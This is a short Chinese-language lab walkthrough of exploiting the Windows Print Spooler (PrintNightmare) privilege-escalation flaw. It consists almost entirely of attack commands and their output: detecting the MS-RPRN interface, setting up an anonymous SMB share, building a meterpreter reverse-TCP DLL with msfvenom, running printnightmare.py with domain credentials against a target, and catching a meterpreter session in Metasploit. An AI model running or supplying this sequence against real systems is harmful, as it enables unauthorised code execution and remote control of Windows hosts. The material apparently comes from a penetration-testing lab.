5.4 Windows Print Spooler权限提升漏洞

1、检测是否存在漏洞

(base) ┌──(root㉿Kali)-[~]
└─# rpcdump.py @10.10.4.8|grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

(base) ┌──(root㉿Kali)-[~]
└─#

2.创建匿名SMB共享

[smb1]
comment = Samba
path = /tmp/test/
guest ok=yes
read only=no
browsable=yes

3、生成dll

(base) ┌──(root㉿Kali)-[/tmp/test]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.4.10 LPORT=9001 -f dll > 1.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes

4、漏洞利用

(base) ┌──(root㉿Kali)-[~/tools/PrintNightmare]
└─# python3 printnightmare.py -dll '\\10.10.4.10\AnonymousShare\1.dll' sec.local/hack:"Az123456@"@10.10.4.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\10.10.4.10\\AnonymousShare\\1.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
Traceback (most recent call last):
  File "/root/tools/PrintNightmare/printnightmare.py", line 760, in <module>
    print_nightmare.exploit(options.name, options.env, options.path, options.dll)
  File "/root/tools/PrintNightmare/printnightmare.py", line 571, in exploit
    resp = hRpcAddPrinterDriverEx(
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/tools/PrintNightmare/printnightmare.py", line 277, in hRpcAddPrinterDriverEx
    return dce.request(request)
           ^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/impacket/dcerpc/v5/rpcrt.py", line 861, in request
    answer = self.recv()
             ^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/impacket/dcerpc/v5/rpcrt.py", line 1334, in recv
    raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
impacket.dcerpc.v5.rpcrt.DCERPCException: Unknown DCE RPC fault status code: c000000d

msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.4.10:9001
[*] Sending stage (203846 bytes) to 10.10.4.8
[*] Meterpreter session 1 opened (10.10.4.10:9001 -> 10.10.4.8:64112) at 2025-06-27 11:55:46 +0800

meterpreter